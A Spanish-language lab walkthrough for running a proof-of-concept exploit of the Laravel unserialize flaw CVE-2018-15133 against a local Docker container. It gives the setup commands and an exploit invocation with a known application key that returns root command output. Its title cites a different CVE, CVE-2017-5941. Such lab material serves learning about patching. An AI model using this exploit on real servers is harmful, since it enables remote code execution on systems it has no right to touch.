
Ejecución de exploit de deserialización con CVE-2017-5941
Explotación de la vulnerabilidad de deserialización CVE-2018-15133 Este exploit aprovecha una vulnerabilidad de deserialización en Laravel Framework hasta 5.5.40 y 5.6.x hasta 5.6.29.
La ejecución remota de código podría ocurrir como resultado de una llamada a unserialize sobre un valor X-XSRF-TOKEN potencialmente no confiable. Esto involucra el método decrypt en Illuminate/Encryption/Encrypter.php y PendingBroadcast en gadgetchains/Laravel/RCE/3/chain.php de phpggc. El atacante debe conocer la clave de la aplicación, lo que normalmente nunca ocurriría, pero podría suceder si el atacante previamente tuvo acceso privilegiado o logró exitosamente un ataque anterior.
Para ejecutar este exploit, necesitas tener instalado lo siguiente en tu máquina:
Descargar e instalar Docker.
Abrir Docker como administrador.
Abrir la terminal y descargar la máquina Docker.
docker pull kozmico/laravel-poc-cve-2018-15133
docker run --name my-laravel-app -p 8000:80 -d kozmico/laravel-poc-cve-2018-15133
Esto iniciará la máquina Laravel.
Intenta abrir en el navegador la máquina para asegurarte de que está funcionando.
Puedes hacerlo con la IP y el puerto; para verificar la IP en Windows ejecuta:
ipconfig
En Linux
ifconfig
wsl --set-default-version 2
wsl --update
Descarga el archivo del exploit en tu máquina.
Abre una terminal y navega hasta la carpeta donde se encuentra el archivo del exploit.
Ejecuta el siguiente comando para explotar el servidor:
./CVE-2018-15133 -URL http://localhost:8000 -API_KEY 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= -command "id"
Esto debería darte la respuesta con el ID de la máquina que deseas atacar. También puedes usar comandos similares para solicitar carpetas y realizar otras tareas.
Respuesta: uid=0(root) gid=0(root) groups=0(root)
En conclusión, en esta vulnerabilidad pudimos observar la importancia de mantener actualizados los frameworks. Ya que estas herramientas pueden tener fallos de seguridad y son ampliamente utilizadas, estamos en riesgo si no nos mantenemos actualizados.